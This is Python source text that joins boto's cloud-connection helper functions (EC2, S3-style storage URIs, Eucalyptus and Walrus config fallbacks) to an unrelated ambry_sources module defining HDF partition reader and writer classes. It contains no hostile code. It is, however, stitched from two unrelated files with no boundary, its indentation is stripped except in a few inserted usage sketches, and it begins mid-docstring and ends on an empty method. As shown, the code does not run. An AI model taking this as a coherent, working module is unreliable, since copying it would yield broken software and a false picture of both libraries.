@type gs_access_key_id: string
@param gs_access_key_id: Your Google Cloud Storage Access Key ID
@type gs_secret_access_key: string
@param gs_secret_access_key: Your Google Cloud Storage Secret Access Key
@rtype: L{GSConnection<boto.gs.connection.GSConnection>}
@return: A connection to Google's Storage service
"""
from boto.gs.connection import GSConnection
return GSConnection(gs_access_key_id, gs_secret_access_key, **kwargs)
def connect_ec2(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.ec2.connection.EC2Connection`
:return: A connection to Amazon's EC2
"""
from boto.ec2.connection import EC2Connection
return EC2Connection(aws_access_key_id, aws_secret_access_key, **kwargs)
def connect_elb(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.ec2.elb.ELBConnection`
:return: A connection to Amazon's Load Balancing Service
"""
from boto.ec2.elb import ELBConnection
return ELBConnection(aws_access_key_id, aws_secret_access_key, **kwargs)
def connect_autoscale(aws_access_key_id=None, aws_secret_access_key=None,
**kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.ec2.autoscale.AutoScaleConnection`
:return: A connection to Amazon's Auto Scaling Service
"""
from boto.ec2.autoscale import AutoScaleConnection
return AutoScaleConnection(aws_access_key_id, aws_secret_access_key,
**kwargs)
def connect_cloudwatch(aws_access_key_id=None, aws_secret_access_key=None,
**kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.ec2.cloudwatch.CloudWatchConnection`
:return: A connection to Amazon's EC2 Monitoring service
"""
from boto.ec2.cloudwatch import CloudWatchConnection
return CloudWatchConnection(aws_access_key_id, aws_secret_access_key,
**kwargs)
def connect_sdb(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.sdb.connection.SDBConnection`
:return: A connection to Amazon's SDB
"""
from boto.sdb.connection import SDBConnection
return SDBConnection(aws_access_key_id, aws_secret_access_key, **kwargs)
def connect_fps(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.fps.connection.FPSConnection`
:return: A connection to FPS
"""
from boto.fps.connection import FPSConnection
return FPSConnection(aws_access_key_id, aws_secret_access_key, **kwargs)
def connect_mturk(aws_access_key_id=None, aws_secret_access_key=None,
**kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.mturk.connection.MTurkConnection`
:return: A connection to MTurk
"""
from boto.mturk.connection import MTurkConnection
return MTurkConnection(aws_access_key_id, aws_secret_access_key, **kwargs)
def connect_cloudfront(aws_access_key_id=None, aws_secret_access_key=None,
**kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.cloudfront.CloudFrontConnection`
:return: A connection to Amazon's CloudFront service
"""
from boto.cloudfront import CloudFrontConnection
return CloudFrontConnection(aws_access_key_id, aws_secret_access_key,
**kwargs)
def connect_vpc(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.vpc.VPCConnection`
:return: A connection to VPC
"""
from boto.vpc import VPCConnection
return VPCConnection(aws_access_key_id, aws_secret_access_key, **kwargs)
def connect_rds(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.rds.RDSConnection`
:return: A connection to RDS
"""
from boto.rds import RDSConnection
return RDSConnection(aws_access_key_id, aws_secret_access_key, **kwargs)
def connect_rds2(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.rds2.layer1.RDSConnection`
:return: A connection to RDS
"""
from boto.rds2.layer1 import RDSConnection
return RDSConnection(aws_access_key_id, aws_secret_access_key, **kwargs)
def connect_emr(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.emr.EmrConnection`
:return: A connection to Amazon's Elastic MapReduce service
"""
from boto.emr import EmrConnection
return EmrConnection(aws_access_key_id, aws_secret_access_key, **kwargs)
def connect_sns(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.sns.SNSConnection`
:return: A connection to Amazon's SNS
"""
from boto.sns import SNSConnection
return SNSConnection(aws_access_key_id, aws_secret_access_key, **kwargs)
def connect_iam(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.iam.IAMConnection`
:return: A connection to Amazon's IAM
"""
from boto.iam import IAMConnection
return IAMConnection(aws_access_key_id, aws_secret_access_key, **kwargs)
def connect_route53(aws_access_key_id=None, aws_secret_access_key=None,
**kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.route53.connection.Route53Connection`
:return: A connection to Amazon's Route53 DNS Service
"""
from boto.route53 import Route53Connection
return Route53Connection(aws_access_key_id, aws_secret_access_key,
**kwargs)
def connect_cloudformation(aws_access_key_id=None, aws_secret_access_key=None,
**kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.cloudformation.CloudFormationConnection`
:return: A connection to Amazon's CloudFormation Service
"""
from boto.cloudformation import CloudFormationConnection
return CloudFormationConnection(aws_access_key_id, aws_secret_access_key,
**kwargs)
def connect_euca(host=None, aws_access_key_id=None, aws_secret_access_key=None,
port=8773, path='/services/Eucalyptus', is_secure=False,
**kwargs):
"""
Connect to a Eucalyptus service.
:type host: string
:param host: the host name or ip address of the Eucalyptus server
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.ec2.connection.EC2Connection`
:return: A connection to Eucalyptus server
"""
from boto.ec2 import EC2Connection
from boto.ec2.regioninfo import RegionInfo
# Check for values in boto config, if not supplied as args
if not aws_access_key_id:
aws_access_key_id = config.get('Credentials',
'euca_access_key_id',
None)
if not aws_secret_access_key:
aws_secret_access_key = config.get('Credentials',
'euca_secret_access_key',
None)
if not host:
host = config.get('Boto', 'eucalyptus_host', None)
reg = RegionInfo(name='eucalyptus', endpoint=host)
return EC2Connection(aws_access_key_id, aws_secret_access_key,
region=reg, port=port, path=path,
is_secure=is_secure, **kwargs)
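# Configuration sketch: connect_euca() falls back to the boto config file for
# anything not passed explicitly. The section/option names below are exactly the
# ones read above; the values are placeholders, not working credentials.
#
#   [Credentials]
#   euca_access_key_id = <your-eucalyptus-access-key>
#   euca_secret_access_key = <your-eucalyptus-secret-key>
#
#   [Boto]
#   eucalyptus_host = cloud.example.internal
#
# With those set, boto.connect_euca() can be called with no arguments.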
def connect_glacier(aws_access_key_id=None, aws_secret_access_key=None,
**kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.glacier.layer2.Layer2`
:return: A connection to Amazon's Glacier Service
"""
from boto.glacier.layer2 import Layer2
return Layer2(aws_access_key_id, aws_secret_access_key,
**kwargs)
def connect_ec2_endpoint(url, aws_access_key_id=None,
aws_secret_access_key=None,
**kwargs):
"""
Connect to an EC2 Api endpoint. Additional arguments are passed
through to connect_ec2.
:type url: string
:param url: A url for the ec2 api endpoint to connect to
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.ec2.connection.EC2Connection`
:return: A connection to the specified EC2 API endpoint
"""
from boto.ec2.regioninfo import RegionInfo
purl = urlparse.urlparse(url)
kwargs['port'] = purl.port
kwargs['host'] = purl.hostname
kwargs['path'] = purl.path
if 'is_secure' not in kwargs:
kwargs['is_secure'] = (purl.scheme == "https")
kwargs['region'] = RegionInfo(name=purl.hostname,
endpoint=purl.hostname)
kwargs['aws_access_key_id'] = aws_access_key_id
kwargs['aws_secret_access_key'] = aws_secret_access_key
return connect_ec2(**kwargs)
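# Usage sketch (the endpoint URL and credentials below are placeholders, not
# working values): connect_ec2_endpoint() splits the URL into host/port/path,
# infers is_secure from the scheme, builds a RegionInfo named after the host,
# and passes everything through to connect_ec2().
def _example_connect_ec2_endpoint():
    return connect_ec2_endpoint(
        'https://cloud.example.com:8773/services/Eucalyptus',
        aws_access_key_id='example-access-key',
        aws_secret_access_key='example-secret-key')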
def connect_walrus(host=None, aws_access_key_id=None,
aws_secret_access_key=None,
port=8773, path='/services/Walrus', is_secure=False,
**kwargs):
"""
Connect to a Walrus service.
:type host: string
:param host: the host name or ip address of the Walrus server
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.s3.connection.S3Connection`
:return: A connection to Walrus
"""
from boto.s3.connection import S3Connection
from boto.s3.connection import OrdinaryCallingFormat
# Check for values in boto config, if not supplied as args
if not aws_access_key_id:
aws_access_key_id = config.get('Credentials',
'euca_access_key_id',
None)
if not aws_secret_access_key:
aws_secret_access_key = config.get('Credentials',
'euca_secret_access_key',
None)
if not host:
host = config.get('Boto', 'walrus_host', None)
return S3Connection(aws_access_key_id, aws_secret_access_key,
host=host, port=port, path=path,
calling_format=OrdinaryCallingFormat(),
is_secure=is_secure, **kwargs)
def connect_ses(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.ses.SESConnection`
:return: A connection to Amazon's SES
"""
from boto.ses import SESConnection
return SESConnection(aws_access_key_id, aws_secret_access_key, **kwargs)
def connect_sts(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.sts.STSConnection`
:return: A connection to Amazon's STS
"""
from boto.sts import STSConnection
return STSConnection(aws_access_key_id, aws_secret_access_key, **kwargs)
def connect_ia(ia_access_key_id=None, ia_secret_access_key=None,
is_secure=False, **kwargs):
"""
Connect to the Internet Archive via their S3-like API.
:type ia_access_key_id: string
:param ia_access_key_id: Your IA Access Key ID. This will also look
in your boto config file for an entry in the Credentials
section called "ia_access_key_id"
:type ia_secret_access_key: string
:param ia_secret_access_key: Your IA Secret Access Key. This will also
look in your boto config file for an entry in the Credentials
section called "ia_secret_access_key"
:rtype: :class:`boto.s3.connection.S3Connection`
:return: A connection to the Internet Archive
"""
from boto.s3.connection import S3Connection
from boto.s3.connection import OrdinaryCallingFormat
access_key = config.get('Credentials', 'ia_access_key_id',
ia_access_key_id)
secret_key = config.get('Credentials', 'ia_secret_access_key',
ia_secret_access_key)
return S3Connection(access_key, secret_key,
host='s3.us.archive.org',
calling_format=OrdinaryCallingFormat(),
is_secure=is_secure, **kwargs)
def connect_dynamodb(aws_access_key_id=None,
aws_secret_access_key=None,
**kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.dynamodb.layer2.Layer2`
:return: A connection to the Layer2 interface for DynamoDB.
"""
from boto.dynamodb.layer2 import Layer2
return Layer2(aws_access_key_id, aws_secret_access_key, **kwargs)
def connect_swf(aws_access_key_id=None,
aws_secret_access_key=None,
**kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.swf.layer1.Layer1`
:return: A connection to the Layer1 interface for SWF.
"""
from boto.swf.layer1 import Layer1
return Layer1(aws_access_key_id, aws_secret_access_key, **kwargs)
def connect_cloudsearch(aws_access_key_id=None,
aws_secret_access_key=None,
**kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.cloudsearch.layer2.Layer2`
:return: A connection to Amazon's CloudSearch service
"""
from boto.cloudsearch.layer2 import Layer2
return Layer2(aws_access_key_id, aws_secret_access_key,
**kwargs)
def connect_beanstalk(aws_access_key_id=None,
aws_secret_access_key=None,
**kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.beanstalk.layer1.Layer1`
:return: A connection to Amazon's Elastic Beanstalk service
"""
from boto.beanstalk.layer1 import Layer1
return Layer1(aws_access_key_id, aws_secret_access_key, **kwargs)
def connect_elastictranscoder(aws_access_key_id=None,
aws_secret_access_key=None,
**kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.elastictranscoder.layer1.ElasticTranscoderConnection`
:return: A connection to Amazon's Elastic Transcoder service
"""
from boto.elastictranscoder.layer1 import ElasticTranscoderConnection
return ElasticTranscoderConnection(
aws_access_key_id=aws_access_key_id,
aws_secret_access_key=aws_secret_access_key,
**kwargs)
def connect_opsworks(aws_access_key_id=None,
aws_secret_access_key=None,
**kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.opsworks.layer1.OpsWorksConnection`
:return: A connection to Amazon's OpsWorks service
"""
from boto.opsworks.layer1 import OpsWorksConnection
return OpsWorksConnection(
aws_access_key_id=aws_access_key_id,
aws_secret_access_key=aws_secret_access_key,
**kwargs)
def connect_redshift(aws_access_key_id=None,
aws_secret_access_key=None,
**kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.redshift.layer1.RedshiftConnection`
:return: A connection to Amazon's Redshift service
"""
from boto.redshift.layer1 import RedshiftConnection
return RedshiftConnection(
aws_access_key_id=aws_access_key_id,
aws_secret_access_key=aws_secret_access_key,
**kwargs
)
def connect_support(aws_access_key_id=None,
aws_secret_access_key=None,
**kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.support.layer1.SupportConnection`
:return: A connection to Amazon's Support service
"""
from boto.support.layer1 import SupportConnection
return SupportConnection(
aws_access_key_id=aws_access_key_id,
aws_secret_access_key=aws_secret_access_key,
**kwargs
)
def connect_cloudtrail(aws_access_key_id=None,
aws_secret_access_key=None,
**kwargs):
"""
Connect to AWS CloudTrail
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.cloudtrail.layer1.CloudTrailConnection`
:return: A connection to the AWS CloudTrail service
"""
from boto.cloudtrail.layer1 import CloudTrailConnection
return CloudTrailConnection(
aws_access_key_id=aws_access_key_id,
aws_secret_access_key=aws_secret_access_key,
**kwargs
)
def connect_directconnect(aws_access_key_id=None,
aws_secret_access_key=None,
**kwargs):
"""
Connect to AWS DirectConnect
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.directconnect.layer1.DirectConnectConnection`
:return: A connection to the AWS DirectConnect service
"""
from boto.directconnect.layer1 import DirectConnectConnection
return DirectConnectConnection(
aws_access_key_id=aws_access_key_id,
aws_secret_access_key=aws_secret_access_key,
**kwargs
)
def connect_kinesis(aws_access_key_id=None,
aws_secret_access_key=None,
**kwargs):
"""
Connect to Amazon Kinesis
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.kinesis.layer1.KinesisConnection`
:return: A connection to the Amazon Kinesis service
"""
from boto.kinesis.layer1 import KinesisConnection
return KinesisConnection(
aws_access_key_id=aws_access_key_id,
aws_secret_access_key=aws_secret_access_key,
**kwargs
)
def storage_uri(uri_str, default_scheme='file', debug=0, validate=True,
bucket_storage_uri_class=BucketStorageUri,
suppress_consec_slashes=True, is_latest=False):
"""
Instantiate a StorageUri from a URI string.
:type uri_str: string
:param uri_str: URI naming bucket + optional object.
:type default_scheme: string
:param default_scheme: default scheme for scheme-less URIs.
:type debug: int
:param debug: debug level to pass in to boto connection (range 0..2).
:type validate: bool
:param validate: whether to check for bucket name validity.
:type bucket_storage_uri_class: BucketStorageUri interface.
:param bucket_storage_uri_class: Allows mocking for unit tests.
:param suppress_consec_slashes: If provided, controls whether
consecutive slashes will be suppressed in key paths.
:type is_latest: bool
:param is_latest: whether this versioned object represents the
current version.
We allow validate to be disabled to allow caller
to implement bucket-level wildcarding (outside the boto library;
see gsutil).
:rtype: :class:`boto.StorageUri` subclass
:return: StorageUri subclass for given URI.
``uri_str`` must be one of the following formats:
* gs://bucket/name
* gs://bucket/name#ver
* s3://bucket/name
* gs://bucket
* s3://bucket
* filename (which could be a Unix path like /a/b/c or a Windows path like
C:\a\b\c)
The last example uses the default scheme ('file', unless overridden).
"""
version_id = None
generation = None
# Manually parse URI components instead of using urlparse.urlparse because
# what we're calling URIs don't really fit the standard syntax for URIs
# (the latter includes an optional host/net location part).
end_scheme_idx = uri_str.find('://')
if end_scheme_idx == -1:
scheme = default_scheme.lower()
path = uri_str
else:
scheme = uri_str[0:end_scheme_idx].lower()
path = uri_str[end_scheme_idx + 3:]
if scheme not in ['file', 's3', 'gs']:
raise InvalidUriError('Unrecognized scheme "%s"' % scheme)
if scheme == 'file':
# For file URIs we have no bucket name, and use the complete path
# (minus 'file://') as the object name.
is_stream = False
if path == '-':
is_stream = True
return FileStorageUri(path, debug, is_stream)
else:
path_parts = path.split('/', 1)
bucket_name = path_parts[0]
object_name = ''
# If validate enabled, ensure the bucket name is valid, to avoid
# possibly confusing other parts of the code. (For example if we didn't
# catch bucket names containing ':', when a user tried to connect to
# the server with that name they might get a confusing error about
# non-integer port numbers.)
if (validate and bucket_name and
(not BUCKET_NAME_RE.match(bucket_name)
or TOO_LONG_DNS_NAME_COMP.search(bucket_name))):
raise InvalidUriError('Invalid bucket name in URI "%s"' % uri_str)
if scheme == 'gs':
match = GENERATION_RE.search(path)
if match:
md = match.groupdict()
versionless_uri_str = md['versionless_uri_str']
path_parts = versionless_uri_str.split('/', 1)
generation = int(md['generation'])
elif scheme == 's3':
match = VERSION_RE.search(path)
if match:
md = match.groupdict()
versionless_uri_str = md['versionless_uri_str']
path_parts = versionless_uri_str.split('/', 1)
version_id = md['version_id']
else:
raise InvalidUriError('Unrecognized scheme "%s"' % scheme)
if len(path_parts) > 1:
object_name = path_parts[1]
return bucket_storage_uri_class(
scheme, bucket_name, object_name, debug,
suppress_consec_slashes=suppress_consec_slashes,
version_id=version_id, generation=generation, is_latest=is_latest)
def storage_uri_for_key(key):
"""Returns a StorageUri for the given key.
:type key: :class:`boto.s3.key.Key` or subclass
:param key: URI naming bucket + optional object.
"""
if not isinstance(key, boto.s3.key.Key):
raise InvalidUriError('Requested key (%s) is not a subclass of '
'boto.s3.key.Key' % str(type(key)))
prov_name = key.bucket.connection.provider.get_provider_name()
uri_str = '%s://%s/%s' % (prov_name, key.bucket.name, key.name)
return storage_uri(uri_str)
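# Usage sketch: storage_uri() only parses the string; no service is contacted
# until the returned StorageUri is used. The bucket/object names below are
# placeholders, and the attribute names follow BucketStorageUri as used
# elsewhere in boto.
def _example_storage_uri_parsing():
    gs_uri = storage_uri('gs://example-bucket/path/to/object')
    assert (gs_uri.scheme, gs_uri.bucket_name, gs_uri.object_name) == \
        ('gs', 'example-bucket', 'path/to/object')
    # Versioned forms (gs://bucket/name#ver) carry the generation/version on the URI.
    s3_uri = storage_uri('s3://example-bucket/key')
    # Scheme-less strings fall back to default_scheme ('file').
    local_uri = storage_uri('/tmp/some-local-file')
    return gs_uri, s3_uri, local_uri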
boto.plugin.load_plugins(config)
"""
Writing data to a HDF partition.
"""
from copy import deepcopy
from functools import reduce
import json
import logging
import math
import time
import os
import re
from tables import open_file, StringCol, Int64Col, Float64Col, BoolCol, Int32Col
from tables.exceptions import NoSuchNodeError
import numpy as np
import six
from six import string_types, iteritems, text_type, binary_type
from ambry_sources.sources import RowProxy
from ambry_sources.stats import Stats
from ambry_sources.mpf import MPRowsFile
logger = logging.getLogger(__name__)
# pytables can't store None for ints, so use minimal int value to store None.
MIN_INT32 = np.iinfo(np.int32).min
MIN_INT64 = np.iinfo(np.int64).min
class HDFError(Exception):
pass
class HDFPartition(object):
""" Stores partition data in the HDF (*.h5) file. """
EXTENSION = '.h5'
VERSION = 1
def __init__(self, url_or_fs, path=None):
"""
Args:
url_or_fs (str or filesystem):
path (str):
"""
from fs.opener import opener
if path:
self._fs, self._path = url_or_fs, path
else:
self._fs, self._path = opener.parse(url_or_fs)
if not self._fs.hassyspath(''):
# Pytables requirement.
raise HDFError('HDFPartition requires filesystem having sys path.')
self._writer = None
self._reader = None
self._process = None # Process name for report_progress
self._start_time = 0
if not self._path.endswith(self.EXTENSION):
self._path = self._path + self.EXTENSION
@property
def path(self):
return self._path
@property
def syspath(self):
if self.exists:
return self._fs.getsyspath(self.path)
else:
return None
@property
def info(self):
return self._info(self.reader)
@property
def exists(self):
return self._fs.exists(self.path)
def remove(self):
if self.exists:
self._fs.remove(self._path)
@property
def meta(self):
if not self.exists:
return None
with self.reader as r:
return r.meta
@property
def stats(self):
return (self.meta or {}).get('stats')
@property
def n_rows(self):
if not self.exists:
return None
with self.reader as r:
return r.n_rows
@property
def headers(self):
if not self.exists:
return None
with self.reader as r:
return r.headers
def run_stats(self):
"""Run the stats process and store the results back in the metadata"""
try:
self._process = 'run_stats'
self._start_time = time.time()
with self.reader as r:
stats = Stats([(c.name, c.type) for c in r.columns]).run(r, sample_from=r.n_rows)
with self.writer as w:
w.set_stats(stats)
finally:
self._process = 'none'
return stats
def load_rows(self, source, run_stats=True):
""" Loads rows from given source.
Args:
source (SourceFile):
run_stats (boolean, optional): if True then collect stat and save it to meta.
Returns:
HDFPartition:
"""
if self.n_rows:
raise HDFError("Can't load_rows; rows already loaded. n_rows = {}".format(self.n_rows))
# None means to determine True or False from the existence of a row spec
try:
self._process = 'load_rows'
self._start_time = time.time()
with self.writer as w:
w.load_rows(source)
if run_stats:
self.run_stats()
finally:
self._process = None
return self
@property
def reader(self):
if not self._reader:
self._reader = HDFReader(self, self.syspath)
return self._reader
def __iter__(self):
""" Iterate over a reader. """
# There is probably a more efficient way in python 2 to do this than to have another yield loop,
# but just returning the reader iterator doesn't work
with self.reader as r:
for row in r:
yield row
def select(self, predicate=None, headers=None):
"""Iterate the results from the reader's select() method"""
with self.reader as r:
for row in r.select(predicate, headers):
yield row
@property
def writer(self):
if not self._writer:
self._process = 'write'
if not self._fs.exists(os.path.dirname(self.path)):
self._fs.makedir(os.path.dirname(self.path), recursive=True)
# we can't use self.syspath here because it may be empty if the file does not exist
self._writer = HDFWriter(self, self._fs.getsyspath(self.path))
return self._writer
def report_progress(self):
"""
This function can be called from a higher level to report progress. It is usually called from an alarm
signal handler which is installed just before starting a load_rows operation:
>>> import signal
>>> f = HDFPartition('tmp://foobar')
>>> def handler(signum, frame):
...     print("Loading: %s, %s rows" % f.report_progress()[:2])
>>> signal.signal(signal.SIGALRM, handler)
>>> f.load_rows([i, i, i] for i in range(1000))
:return: Tuple: (process description, #records, #total records, #rate)
"""
rec = total = rate = 0
if self._process in ('load_rows', 'write') and self._writer:
rec = self._writer.n_rows
rate = round(float(rec) / float(time.time() - self._start_time), 2)
elif self._reader:
rec = self._reader.pos
total = self._reader.data_end_row
rate = round(float(rec) / float(time.time() - self._start_time), 2)
return (self._process, rec, total, rate)
@classmethod
def _columns(cls, o, n_cols=0):
""" Wraps columns from meta['schema'] with RowProxy and generates them.
Args:
o (any having .meta dict attr):
Generates:
RowProxy: column wrapped with RowProxy
"""
s = o.meta['schema']
assert len(s) >= 1 # Should always have header row.
assert o.meta['schema'][0] == MPRowsFile.SCHEMA_TEMPLATE, (o.meta['schema'][0], MPRowsFile.SCHEMA_TEMPLATE)
# n_cols here is for columns in the data table, which are rows in the headers table
n_cols = max(n_cols, o.n_cols, len(s) - 1)
for i in range(1, n_cols + 1):
# Normally, we'd only create one of these, and set the row on the singleton for
# each row. But in this case, the caller may turn the output of the method into a list,
# in which case all of the rows would have the values of the last one.
rp = RowProxy(s[0])
try:
row = s[i]
except IndexError:
# Extend the row, but make sure the pos value is set properly.
ext_row = [i, 'col{}'.format(i)] + [None] * (len(s[0]) - 2)
s.append(ext_row)
row = s[i]
yield rp.set_row(row)
assert o.meta['schema'][0] == MPRowsFile.SCHEMA_TEMPLATE
@classmethod
def _info(cls, o):
return dict(
version=o.version,
data_start_pos=0,
meta_start_pos=0,
rows=o.n_rows,
cols=o.n_cols,
header_rows=o.meta['row_spec']['header_rows'],
data_start_row=0,
data_end_row=None,
comment_rows=o.meta['row_spec']['comment_rows'],
headers=o.headers
)
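# Usage sketch (illustrative only): `source` is assumed to be an ambry_sources
# SourceFile-like object whose columns/types have already been intuited, and
# 'tmp://example.h5' is a placeholder pyfilesystem URL with a sys path.
def _example_load_and_read(source):
    partition = HDFPartition('tmp://example.h5')
    partition.load_rows(source)                 # writes rows + meta, then runs stats
    names = partition.headers                   # column names from meta['schema']
    rows = [row.dict for row in partition]      # copy reused RowProxy rows out as dicts
    selected = [r.dict for r in partition.select(lambda r: True)]
    return names, rows, selected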
class HDFWriter(object):
def __init__(self, parent, filename):
if not isinstance(filename, string_types):
raise ValueError(
'Pytables requires filename parameter as string. Got {} instead.'
.format(filename.__class__))
self.parent = parent
self.version = HDFPartition.VERSION
self.n_rows = 0
self.n_cols = 0
self.cache = []
if os.path.exists(filename):
self._h5_file = open_file(filename, mode='a')
self.meta = HDFReader._read_meta(self._h5_file)
self.version, self.n_rows, self.n_cols = _get_file_header(
self._h5_file.root.partition.file_header)
else:
# No, doesn't exist
self._h5_file = open_file(filename, mode='w')
self.meta = deepcopy(MPRowsFile.META_TEMPLATE)
self.header_mangler = lambda name: re.sub(r'_+', '_', re.sub(r'[^\w_]', '_', name).lower()).rstrip('_')
if self.n_rows == 0:
self.meta['about']['create_time'] = time.time()
@property
def info(self):
return HDFPartition._info(self)
def set_col_val(name_or_pos, **kwargs):
pass
@property
def headers(self):
""" Return the headers rows. """
return [e.name for e in HDFPartition._columns(self)]
@headers.setter
def headers(self, headers):
""" Set column names. """
if not headers:
return
assert isinstance(headers, (tuple, list)), headers
for i, row in enumerate(HDFPartition._columns(self, len(headers))):
assert isinstance(headers[i], string_types)
row.name = headers[i]
assert self.meta['schema'][0] == MPRowsFile.SCHEMA_TEMPLATE
@property
def columns(self):
""" Returns the columns specifications. """
return HDFPartition._columns(self)
@columns.setter
def columns(self, headers):
for i, row in enumerate(HDFPartition._columns(self, len(headers))):
h = headers[i]
if isinstance(h, dict):
raise NotImplementedError()
else:
row.name = h
def column(self, name_or_pos):
for h in self.columns:
if name_or_pos == h.pos or name_or_pos == h.name:
return h
raise KeyError("Didn't find '{}' as either a name nor a position ".format(name_or_pos))
def insert_row(self, row):
self.n_rows += 1
self.cache.append(row)
if len(self.cache) >= 10000:
self._write_rows()
def insert_rows(self, rows):
""" Inserts a list of rows. Does not insert iterators.
Args:
rows (list of list):
"""
self.n_rows += len(rows)
self._write_rows(rows)
def load_rows(self, source):
